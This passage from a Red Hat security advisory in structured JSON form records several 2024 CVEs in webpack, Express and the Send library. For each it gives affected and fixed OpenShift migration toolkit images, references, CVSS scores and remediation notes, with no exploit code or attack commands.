"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", 